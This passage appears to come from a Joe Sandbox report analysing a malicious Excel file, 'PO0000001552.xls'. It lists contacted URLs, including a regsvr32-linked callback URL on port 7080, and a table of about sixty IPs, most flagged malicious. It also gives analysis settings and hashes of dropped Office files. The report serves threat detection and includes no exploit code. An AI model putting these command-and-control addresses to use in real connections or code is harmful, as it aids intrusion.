                                                                                                                        https://api.office.netE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                          high
                                                                                                                          https://incidents.diagnosticssdf.office.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                            high
                                                                                                                            https://asgsmsproxyapi.azurewebsites.net/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            unknown
                                                                                                                            https://clients.config.office.net/user/v1.0/android/policiesE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                              high
                                                                                                                              https://45.63.99.23:7080/qqvehgyxm/bitss/ktcpnaio/%regsvr32.exe, 0000000C.00000003.2004490975.0000000000A0D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://entitlement.diagnostics.office.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                                high
                                                                                                                                https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://substrate.office.com/search/api/v2/initE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://outlook.office.com/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://storage.live.com/clientlogs/uploadlocationE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://outlook.office365.com/E9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://webshell.suite.office.comE9097BEB-F41B-41FA-A529-2854DCDBD67E.0.drfalse
                                                                                                                                            high
                                                                                                                                            • No. of IPs < 25%
                                                                                                                                            • 25% < No. of IPs < 50%
                                                                                                                                            • 50% < No. of IPs < 75%
                                                                                                                                            • 75% < No. of IPs
                                                                                                                                            IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                            110.232.117.186
                                                                                                                                            unknownAustralia
                                                                                                                                            56038RACKCORP-APRackCorpAUtrue
                                                                                                                                            103.132.242.26
                                                                                                                                            unknownIndia
                                                                                                                                            45117INPL-IN-APIshansNetworkINtrue
                                                                                                                                            104.168.155.143
                                                                                                                                            unknownUnited States
                                                                                                                                            54290HOSTWINDSUStrue
                                                                                                                                            79.137.35.198
                                                                                                                                            unknownFrance
                                                                                                                                            16276OVHFRtrue
                                                                                                                                            45.118.115.99
                                                                                                                                            unknownIndonesia
                                                                                                                                            131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                                                                                                                                            172.104.251.154
                                                                                                                                            unknownUnited States
                                                                                                                                            63949LINODE-APLinodeLLCUStrue
                                                                                                                                            115.68.227.76
                                                                                                                                            unknownKorea Republic of
                                                                                                                                            38700SMILESERV-AS-KRSMILESERVKRtrue
                                                                                                                                            81.68.152.197
                                                                                                                                            ly.yjlianyi.topChina
                                                                                                                                            45090CNNIC-TENCENT-NET-APShenzhenTencentComputerSystemsCompafalse
                                                                                                                                            163.44.196.120
                                                                                                                                            unknownSingapore
                                                                                                                                            135161GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSGtrue
                                                                                                                                            206.189.28.199
                                                                                                                                            unknownUnited States
                                                                                                                                            14061DIGITALOCEAN-ASNUStrue
                                                                                                                                            45.63.99.23
                                                                                                                                            unknownUnited States
                                                                                                                                            20473AS-CHOOPAUStrue
                                                                                                                                            107.170.39.149
                                                                                                                                            unknownUnited States
                                                                                                                                            14061DIGITALOCEAN-ASNUStrue
                                                                                                                                            197.242.150.244
                                                                                                                                            unknownSouth Africa
                                                                                                                                            37611AfrihostZAtrue
                                                                                                                                            185.4.135.165
                                                                                                                                            unknownGreece
                                                                                                                                            199246TOPHOSTGRtrue
                                                                                                                                            183.111.227.137
                                                                                                                                            unknownKorea Republic of
                                                                                                                                            4766KIXS-AS-KRKoreaTelecomKRtrue
                                                                                                                                            45.176.232.124
                                                                                                                                            unknownColombia
                                                                                                                                            267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                                                                                                                                            139.59.56.73
                                                                                                                                            unknownSingapore
                                                                                                                                            14061DIGITALOCEAN-ASNUStrue
                                                                                                                                            169.57.156.166
                                                                                                                                            unknownUnited States
                                                                                                                                            36351SOFTLAYERUStrue
                                                                                                                                            175.98.167.165
                                                                                                                                            datie-tw.comTaiwan; Republic of China (ROC)
                                                                                                                                            9924TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvifalse
                                                                                                                                            164.68.99.3
                                                                                                                                            unknownGermany
                                                                                                                                            51167CONTABODEtrue
                                                                                                                                            139.59.126.41
                                                                                                                                            unknownSingapore
                                                                                                                                            14061DIGITALOCEAN-ASNUStrue
                                                                                                                                            167.172.253.162
                                                                                                                                            unknownUnited States
                                                                                                                                            14061DIGITALOCEAN-ASNUStrue
                                                                                                                                            147.139.166.154
                                                                                                                                            unknownUnited States
                                                                                                                                            45102CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdCtrue
                                                                                                                                            202.129.205.3
                                                                                                                                            unknownThailand
                                                                                                                                            45328NIPA-AS-THNIPATECHNOLOGYCOLTDTHtrue
                                                                                                                                            167.172.199.165
                                                                                                                                            unknownUnited States
                                                                                                                                            14061DIGITALOCEAN-ASNUStrue
                                                                                                                                            153.92.5.27
                                                                                                                                            unknownGermany
                                                                                                                                            47583AS-HOSTINGERLTtrue
                                                                                                                                            159.65.140.115
                                                                                                                                            unknownUnited States
                                                                                                                                            14061DIGITALOCEAN-ASNUStrue
                                                                                                                                            159.65.88.10
                                                                                                                                            unknownUnited States
                                                                                                                                            14061DIGITALOCEAN-ASNUStrue
                                                                                                                                            172.105.226.75
                                                                                                                                            unknownUnited States
                                                                                                                                            63949LINODE-APLinodeLLCUStrue
                                                                                                                                            164.90.222.65
                                                                                                                                            unknownUnited States
                                                                                                                                            14061DIGITALOCEAN-ASNUStrue
                                                                                                                                            213.239.212.5
                                                                                                                                            unknownGermany
                                                                                                                                            24940HETZNER-ASDEtrue
                                                                                                                                            5.135.159.50
                                                                                                                                            unknownFrance
                                                                                                                                            16276OVHFRtrue
                                                                                                                                            173.255.211.88
                                                                                                                                            unknownUnited States
                                                                                                                                            63949LINODE-APLinodeLLCUStrue
                                                                                                                                            212.24.98.99
                                                                                                                                            unknownLithuania
                                                                                                                                            62282RACKRAYUABRakrejusLTtrue
                                                                                                                                            186.194.240.217
                                                                                                                                            unknownBrazil
                                                                                                                                            262733NetceteraTelecomunicacoesLtdaBRtrue
                                                                                                                                            91.187.140.35
                                                                                                                                            unknownSerbia
                                                                                                                                            13092UB-ASRStrue
                                                                                                                                            119.59.103.152
                                                                                                                                            unknownThailand
                                                                                                                                            56067METRABYTE-TH453LadplacoutJorakhaebuaTHtrue
                                                                                                                                            159.89.202.34
                                                                                                                                            unknownUnited States
                                                                                                                                            14061DIGITALOCEAN-ASNUStrue
                                                                                                                                            201.94.166.162
                                                                                                                                            unknownBrazil
                                                                                                                                            28573CLAROSABRtrue
                                                                                                                                            160.16.142.56
                                                                                                                                            unknownJapan9370SAKURA-BSAKURAInternetIncJPtrue
                                                                                                                                            103.75.201.2
                                                                                                                                            unknownThailand
                                                                                                                                            133496CDNPLUSCOLTD-AS-APCDNPLUSCOLTDTHtrue
                                                                                                                                            91.207.28.33
                                                                                                                                            unknownKyrgyzstan
                                                                                                                                            39819PROHOSTKGtrue
                                                                                                                                            103.43.75.120
                                                                                                                                            unknownJapan20473AS-CHOOPAUStrue
                                                                                                                                            188.44.20.25
                                                                                                                                            unknownMacedonia
                                                                                                                                            57374GIV-ASMKtrue
                                                                                                                                            45.235.8.30
                                                                                                                                            unknownBrazil
                                                                                                                                            267405WIKINETTELECOMUNICACOESBRtrue
                                                                                                                                            153.126.146.25
                                                                                                                                            unknownJapan7684SAKURA-ASAKURAInternetIncJPtrue
                                                                                                                                            72.15.201.15
                                                                                                                                            unknownUnited States
                                                                                                                                            13649ASN-VINSUStrue
                                                                                                                                            82.223.21.224
                                                                                                                                            unknownSpain
                                                                                                                                            8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                                                                            173.212.193.249
                                                                                                                                            unknownGermany
                                                                                                                                            51167CONTABODEtrue
                                                                                                                                            47.92.35.35
                                                                                                                                            sbm.xinmoshiwang.comChina
                                                                                                                                            37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                                                            95.217.221.146
                                                                                                                                            unknownGermany
                                                                                                                                            24940HETZNER-ASDEtrue
                                                                                                                                            41.63.0.22
                                                                                                                                            copunupo.ac.zmZambia
                                                                                                                                            37532ZAMRENZMfalse
                                                                                                                                            149.56.131.28
                                                                                                                                            unknownCanada
                                                                                                                                            16276OVHFRtrue
                                                                                                                                            209.97.163.214
                                                                                                                                            unknownUnited States
                                                                                                                                            14061DIGITALOCEAN-ASNUStrue
                                                                                                                                            182.162.143.56
                                                                                                                                            unknownKorea Republic of
                                                                                                                                            3786LGDACOMLGDACOMCorporationKRtrue
                                                                                                                                            1.234.2.232
                                                                                                                                            unknownKorea Republic of
                                                                                                                                            9318SKB-ASSKBroadbandCoLtdKRtrue
                                                                                                                                            129.232.188.93
                                                                                                                                            unknownSouth Africa
                                                                                                                                            37153xneeloZAtrue
                                                                                                                                            94.23.45.86
                                                                                                                                            unknownFrance
                                                                                                                                            16276OVHFRtrue
                                                                                                                                            IP
                                                                                                                                            192.168.2.1
                                                                                                                                            Joe Sandbox Version:36.0.0 Rainbow Opal
                                                                                                                                            Analysis ID:745091
                                                                                                                                            Start date and time:2022-11-13 19:26:14 +01:00
                                                                                                                                            Joe Sandbox Product:CloudBasic
                                                                                                                                            Overall analysis duration:0h 5m 26s
                                                                                                                                            Hypervisor based Inspection enabled:false
                                                                                                                                            Report type:light
                                                                                                                                            Sample file name:PO0000001552.xls
                                                                                                                                            Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                                                                            Analysis system description:Windows 10 64 bit version 1909 (MS Office 2019, IE 11, Chrome 104, Firefox 88, Adobe Reader DC 21, Java 8 u291, 7-Zip)
                                                                                                                                            Number of analysed new started processes analysed:19
                                                                                                                                            Number of new started drivers analysed:0
                                                                                                                                            Number of existing processes analysed:0
                                                                                                                                            Number of existing drivers analysed:0
                                                                                                                                            Number of injected processes analysed:0
                                                                                                                                            Technologies:
                                                                                                                                            • HCA enabled
                                                                                                                                            • EGA enabled
                                                                                                                                            • HDC enabled
                                                                                                                                            • AMSI enabled
                                                                                                                                            Analysis Mode:default
                                                                                                                                            Analysis stop reason:Timeout
                                                                                                                                            Detection:MAL
                                                                                                                                            Classification:mal100.troj.expl.evad.winXLS@11/15@4/59
                                                                                                                                            EGA Information:
                                                                                                                                            • Successful, ratio: 50%
                                                                                                                                            HDC Information:
                                                                                                                                            • Successful, ratio: 67.7% (good quality ratio 58.8%)
                                                                                                                                            • Quality average: 65.2%
                                                                                                                                            • Quality standard deviation: 35.3%
                                                                                                                                            HCA Information:
                                                                                                                                            • Successful, ratio: 100%
                                                                                                                                            • Number of executed functions: 0
                                                                                                                                            • Number of non-executed functions: 0
                                                                                                                                            Cookbook Comments:
                                                                                                                                            • Found application associated with file extension: .xls
                                                                                                                                            • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, SIHClient.exe, backgroundTaskHost.exe, SgrmBroker.exe, usocoreworker.exe, svchost.exe
                                                                                                                                            • TCP Packets have been reduced to 100
                                                                                                                                            • Excluded IPs from analysis (whitelisted): 52.109.76.141, 52.109.77.0, 52.113.194.132, 52.109.89.14, 88.221.168.226, 13.69.239.73
                                                                                                                                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, login.live.com, e16604.g.akamaiedge.net, onedscolprdneu03.northeurope.cloudapp.azure.com, officeclient.microsoft.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, prod.nexusrules.live.com.akadns.net, s-0005.s-msedge.net, config.officeapps.live.com, ecs.office.trafficmanager.net, nexusrules.officeapps.live.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                            • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                            TimeTypeDescription
                                                                                                                                            19:27:45API Interceptor6x Sleep call for process: regsvr32.exe modified
                                                                                                                                            No context
                                                                                                                                            No context
                                                                                                                                            No context
                                                                                                                                            No context
                                                                                                                                            No context
                                                                                                                                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:JSON data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):379722
                                                                                                                                            Entropy (8bit):4.9088149211082355
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:MApDpphudnceJZezca9uRszBEmj6QkjfoJ5Jj7DMnDAYRbLSm5rYOLdHKmC9:lDThumeGzcTRszB7DkjfaJj76RbNbLW9
                                                                                                                                            MD5:E9FB5A0DF105C6F7F80E8B650DF56AAB
                                                                                                                                            SHA1:0B7F6ADA05673F2535E61267C3CB428489ECEB55
                                                                                                                                            SHA-256:A24470762A1F9F5F069C0F70EF53D693D08B7C99797935800FF294BD3B2566F3
                                                                                                                                            SHA-512:65C83135CE550981ED88CB4A83127CB3C94D5C616F26B05185FCC129E5201A88EB0A1351D144E1511B50ADB388071BFCC60388FDD613EBBA5B202FFC76F7D42B
                                                                                                                                            Malicious:false
                                                                                                                                            Reputation:moderate, very likely benign file
                                                                                                                                            Preview:{"MajorVersion":4,"MinorVersion":17,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Agency FB"}],"gn":"Agency FB","id":"31150835240","p":[2,11,8,4,2,2,2,2,2,4],"sub":[],"t":"ttf","u":[3,0,0,0],"v":67502,"w":45875968},{"c":[536870913,0],"dn":"Agency FB","fs":52680,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Agency FB"}],"gn":"Agency FB","id":"29260917085","p":[2,11,5,3,2,2,2,2,
                                                                                                                                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_17RegularVersion 4.17;O365
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):672416
                                                                                                                                            Entropy (8bit):6.566110770587873
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12288:/3zUbLds556T1BEFGHtASk3+/KLQ/zp1km/WJ1ov0mPqxXE/RoVZPE9Ob:/Qfds5opwSL1kovT92
                                                                                                                                            MD5:4DFB7AADD4771ADDF1BA168C12DEDBF3
                                                                                                                                            SHA1:B379DC0E19FE0F51E77305BE0A7F3421B80E8A0F
                                                                                                                                            SHA-256:DB9B46CC2132D76EF90CA9A59AF03CB478BB91EA2CDA3E8E42DD0801873416E2
                                                                                                                                            SHA-512:1C5AE2C794017A81A4232A2EF43725A0DA30F9672123940D85D34A4A77744D2D7ECA5FFE9A91E2FEDDBDBADE4EEAD6AB80E565C1F8FBB813C5A2BC25F7F0A359
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:........... OS/29.P...(...`cmap.s.........pglyf..e.......0.head-@;,.......6hheaE.@B.......$hmtx...........ploca..@....h...tmaxp........... name.T+...A|....post...<..B.... ........Me.._.<...........<.............Aa.x.................Q....Aa....Aa.........................~...........................j.......................3..............................MS .@.......(...Q................. ...........d.......0...J.......8...>..........+a..#...,................K.......z...............N......*...!...-...+....z.......h..%^..3...&j..+...+%.."....................l......$A...,.......g...&...=.......X..&........*......&...(B...............#.......j...............+...P...5...@...)..........#............*...N...7......<...;>.............. ]...........5......#....s.......$.......$.......^...................H.......%...7.......6.......O...V...........K.......c......!...........$...&...*p..+<..+...-....q.......O...................F..(....5..0K..$...0V...k..*e...o...........S...*...0..0...*M......9...
                                                                                                                                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):150846
                                                                                                                                            Entropy (8bit):5.357322582686688
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:h+C7/gd3B4BQguw//Q9DQe+zQVk4F77nXmvidOXRsEwrNz6S:BHQ9DQe+zbXza
                                                                                                                                            MD5:322904D0B0020748A8ABC41788D78D9F
                                                                                                                                            SHA1:4CD879E03CEA5D5FEAEAB7BD9614BD392BADD8D1
                                                                                                                                            SHA-256:BF4C38ADA89E2623EC0AE27071BA770C6B7AE2966C93717F05B109E2FEDD38E4
                                                                                                                                            SHA-512:B90C3082BCFB5DC3F0A4D5E653DAA94950B3D7CFF1B14864291DBBC0775DEB5081F81033C916EA78C6E3A36F3CCCC22C612B0D158769E6C6A7FDA891CE33C9C5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-11-13T18:26:46">.. Build: 16.0.15905.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[MAX.ResourceId]" o:authorityUrl="[ADALAuthorityU
                                                                                                                                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:XML 1.0 document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):338423
                                                                                                                                            Entropy (8bit):5.1629516010869905
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:42/zodZJr6KP+1u6uSivsUQK75IthK8nF2XuN:VOr6KP+1u6uSivsUQK75IthYXU
                                                                                                                                            MD5:4FF54C343D309A7F69BD16B392F8C3A3
                                                                                                                                            SHA1:AC4012E403854396974652804E46E5406B23E492
                                                                                                                                            SHA-256:DBD62290F655ACCC6686A46A62909475980AA09102B3A0D7BAF2278B4DBA56AC
                                                                                                                                            SHA-512:0268D2B5D833AECB6AD08619F8C08254958978C66CEE156B61A52FE442AB5DB0F9BD12FF9D3CFC1C2E2A2858A8D8D32D2AE361DF3D9610E135A97A12664E0E9B
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:<?xml version="1.0" encoding="utf-8"?><Rules xmlns="urn:Rules"><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU" xmlns=""><S><Etw T="1" E="159" G="{02fd33df-f746-4a10-93a0-2bc6273bc8e4}" /><F T="2"><O T="AND"><L><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="37" T="U32" /></R></O></L><R><O T="NE"><L><S T="1" F="Warning" /></L><R><V V="29" T="U32" /></R></O></R></O></F><TI T="3" I="10min" /><A T="4" E="TelemetrySuspend" /><A T="5" E="TelemetryShutdown" /></S><G I="true" R="TriggerOldest"><S T="2"><F N="RuleID" /><F N="RuleVersion" /><F N="Warning" /><F N="Info" /></S></G><C T="U32" I="0" O="false" N="ErrorCount"><C><S T="2" /></C></C><C T="U32" I="1" O="false" N="ErrorRuleId"><S T="2" F="RuleID" /></C><C T="U16" I="2" O="false" N="ErrorRuleVersion"><S T="2" F="RuleVersion" /></C><C T="U8" I="3" O="false" N="WarningInfo"><S T="2"
                                                                                                                                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2278
                                                                                                                                            Entropy (8bit):3.8418307979091164
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:uiTrlKxsxxHxl9Il8utFJfX3b5y2R1eN66LY0d1rc:vTYrFJfX4iQYz
                                                                                                                                            MD5:3AE033F53B76D362C4A93629A0419482
                                                                                                                                            SHA1:14ED84431F31521E6327C666D1D2EC766E392016
                                                                                                                                            SHA-256:8C47A04565A320D35B265549BC11BED0BDCB001BCC28028638B4C8330324A270
                                                                                                                                            SHA-512:140863AA0784A3A57F4E0F9C0020A895E5D3FAE80ADF5F01EF80CA346B5C8CE4293FD788C0C43B685E3BD1BFD953A8155DF1E4AA647D3CCEA8C39F49AAD10E26
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".C.J.1.m.u.g.S.o.z.s.S.9.x.S.Z./.Q.v.O.c.+.E.J.4.u.2.c.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.O.I.i.4.J.X.3.2.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.B.4.7.F.9.z.
                                                                                                                                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2684
                                                                                                                                            Entropy (8bit):3.907754828884943
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:uiTrlKxJx+xl9Il8uaz7HYRtKu9pEV2EpNYn549Ymca2d/vc:vYMPHQGV2EpNaYnT
                                                                                                                                            MD5:25F51D45674CF9EC3EEEFA2D89F736B0
                                                                                                                                            SHA1:50A2C33FE720343EDFFC4DCBA09F832901FD819A
                                                                                                                                            SHA-256:46DC8D20C16586691C4ED93B0B45AE530C67837B927BD79314D4EA62FD1C4FDE
                                                                                                                                            SHA-512:D8D4709354EC7D3A66CB79CA0C3DF507B67CEF3B4AD63344694DAA5FB03C99F8A88A81659E1B53F949167B929AF0B5DD7A9C94044D460F21C1757466065CA5FD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".V.H.X.L.G.R.5.H.j.D.k.3.C.i.F.b.L.a.m.K.N.+.n.c.g.T.0.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".F.+.R.0.9.1.4.W.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.B.4.7.F.9.z.
                                                                                                                                            Process:C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3902
                                                                                                                                            Entropy (8bit):3.9837858181337045
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:GzYVH0Ed0sgxZ/xv8uyIefnFVIaBy5LgVtNKrkqq:6pEerxhxvxyIGVyFgVt8Lq
                                                                                                                                            MD5:B14B26190EE6FABE32EAB2F9EE926454
                                                                                                                                            SHA1:84F8AE7E2451837C856F2ABF6AC98CD24B0B4EE9
                                                                                                                                            SHA-256:071A156E540064BA81D051C98C3F2317E0ECE6440D2C76E6E5A40F17959B9983
                                                                                                                                            SHA-512:E437437F20A6B6D8CE7FB1BDB73E5001F1B85D7A678202A98DB56D282C17FE712159BD276AE307E5130F546B1CB0D7CA820398E561B059FDBC63DFB2C9EE38ED
                                                                                                                                            Malicious:false
